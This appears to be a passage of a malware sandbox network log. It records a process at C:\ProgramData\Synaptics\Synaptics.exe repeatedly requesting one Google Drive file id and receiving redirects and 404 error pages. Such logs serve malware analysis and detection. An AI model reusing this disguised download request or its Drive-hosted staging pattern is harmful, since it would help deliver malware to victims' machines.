2024-12-30 10:41:39 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:41:39 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 79 4b 77 41 74 31 4b 51 61 30 46 63 6d 41 2d 6d 70 72 62 6d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="UyKwAt1KQa0FcmA-mprbmw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:41:39 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49879	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:38 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
2024-12-30 10:41:39 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:39 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-fvBEyhhfmXWiZUpHhUEOEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49882	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:39 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
2024-12-30 10:41:39 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:39 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-9xr__-ENpTgeNq96ytEAfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	49887	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:39 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:39 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC600ejj1bcdxMog52-vn7dK9IibMPzJ-yJPAsTBSNQGb7FCYJlzrYXz-9bao5Q-MjQ0vQUGg44 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:39 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-wF1SvxsrY-un_vzEEd7Atw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:39 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:39 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 70 61 51 4c 39 44 71 44 45 33 57 4a 4c 50 4a 67 76 5a 42 46 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="rpaQL9DqDE3WJLPJgvZBFA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:39 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	49888	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:39 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
2024-12-30 10:41:40 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:40 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-SAYvl7J_A9p_8_LTcTD0fQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	49889	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:39 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:40 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4-VWxoJC0w5mDpcE4Wpk-GP3yPYX0E2wlYmkZkl7Gu6PPJ0gHidjOCLdS_TH5Ay3KS Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:40 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-IrU2DgpwPLf5z7oHRj56Ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:40 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:41:40 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 51 79 30 4b 76 63 76 53 75 35 55 35 42 6a 7a 31 51 54 6a 62 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="RQy0KvcvSu5U5Bjz1QTjbA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:41:40 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	49898	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:40 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
2024-12-30 10:41:40 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:40 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-uc_RDZ9ABwNI6175YAisFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	49899	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:40 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	49908	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:41 UTC	344	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=RptK4L7-WcWnn1WOnOAfqFyy7_is62_P0cYNzDuKNSqORBA5edKlGKJ4_MBrWBgYUlr_8a7xKgqcwsKSMfevphtta04k_tNz4OGERqeeLgoTez6yHhodBUes5PKV7f7DeKNjLKKBL5a8HWZ176A_kZutXgBG2O1OsWe45NsBGB33F8GeeHyD3Bw
2024-12-30 10:41:41 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:41 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-DFRaHTkF-olXU8HSa4M2Cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	49907	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:41 UTC	344	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=RptK4L7-WcWnn1WOnOAfqFyy7_is62_P0cYNzDuKNSqORBA5edKlGKJ4_MBrWBgYUlr_8a7xKgqcwsKSMfevphtta04k_tNz4OGERqeeLgoTez6yHhodBUes5PKV7f7DeKNjLKKBL5a8HWZ176A_kZutXgBG2O1OsWe45NsBGB33F8GeeHyD3Bw
2024-12-30 10:41:41 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:41 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-vpz3g_fuOyCvN6-WAIXDTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	49909	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:41 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
